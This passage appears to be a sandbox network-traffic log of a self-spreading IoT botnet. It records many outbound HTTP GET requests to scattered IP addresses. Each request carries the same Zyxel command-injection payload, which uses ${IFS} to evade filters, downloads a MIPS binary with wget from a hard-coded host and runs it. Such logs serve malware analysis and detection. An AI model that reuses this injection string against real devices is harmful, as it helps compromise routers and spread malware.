                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.884785891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9029192.168.2.2342516140.101.211.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.884819984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9030192.168.2.2342742220.34.45.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.884846926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9031192.168.2.233617042.15.247.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.884877920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9032192.168.2.234921284.90.137.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.884927034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9033192.168.2.235694837.34.36.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.884957075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9034192.168.2.2343922154.151.13.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885020018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9035192.168.2.2342762161.20.153.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885056019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9036192.168.2.2352858100.148.202.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885102987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9037192.168.2.23540802.247.59.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885144949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9038192.168.2.235018625.235.162.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885179043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9039192.168.2.2340832118.67.172.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885221004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9040192.168.2.2340096179.8.207.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885251045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9041192.168.2.234415023.132.209.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885305882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9042192.168.2.234510481.120.180.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885354042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9043192.168.2.234860453.79.232.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885374069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9044192.168.2.23338284.87.229.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885433912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9045192.168.2.2338370164.94.199.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885502100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9046192.168.2.2349900203.210.153.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885545969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9047192.168.2.2356082129.105.157.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885565996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9048192.168.2.233727460.6.111.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885612965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9049192.168.2.233793059.9.33.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885648966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9050192.168.2.2337180179.101.5.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885708094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9051192.168.2.2354120152.164.61.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885727882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9052192.168.2.234856494.173.221.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885761976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9053192.168.2.233446839.236.216.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885799885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9054192.168.2.2360038159.48.137.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885826111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9055192.168.2.233286836.1.12.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885881901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9056192.168.2.2353840223.51.122.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885925055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9057192.168.2.2354712218.192.178.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885948896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9058192.168.2.2348442125.52.26.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.885984898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9059192.168.2.233970889.99.53.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886035919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9060192.168.2.2344436196.163.28.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886060953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9061192.168.2.235450453.125.148.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886106014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9062192.168.2.233398638.86.230.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886130095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9063192.168.2.2346710159.155.69.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886173964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9064192.168.2.2341700143.235.104.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886219025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9065192.168.2.235019462.216.221.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886229038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9066192.168.2.2334412119.138.123.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886291981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9067192.168.2.2355580172.78.230.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886291981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9068192.168.2.236065651.145.112.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886343956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9069192.168.2.2347630119.170.114.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886405945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9070192.168.2.233290234.24.150.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886466026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9071192.168.2.23383609.95.100.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886491060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9072192.168.2.235447057.53.231.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886521101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9073192.168.2.234056246.244.74.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886569977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9074192.168.2.235515632.42.112.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886599064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9075192.168.2.235502447.85.133.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886643887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9076192.168.2.2354984122.176.27.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886696100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9077192.168.2.234297269.237.164.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886727095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9078192.168.2.2337892135.135.199.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886759043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9079192.168.2.2338984218.252.106.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886815071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9080192.168.2.234664218.144.249.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886838913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9081192.168.2.2349502178.69.20.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886895895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9082192.168.2.235854882.164.51.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886935949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9083192.168.2.2347166191.163.245.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.886975050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9084192.168.2.2340424186.163.223.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887010098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9085192.168.2.2334628133.183.53.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887061119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9086192.168.2.234885493.40.216.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887109995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9087192.168.2.233464680.43.171.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887144089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9088192.168.2.2349938113.217.76.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887183905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9089192.168.2.2337846116.225.55.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887216091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9090192.168.2.2349906120.102.164.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.887263060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9091192.168.2.2333720144.64.155.34443
                                                TimestampBytes transferredDirectionData
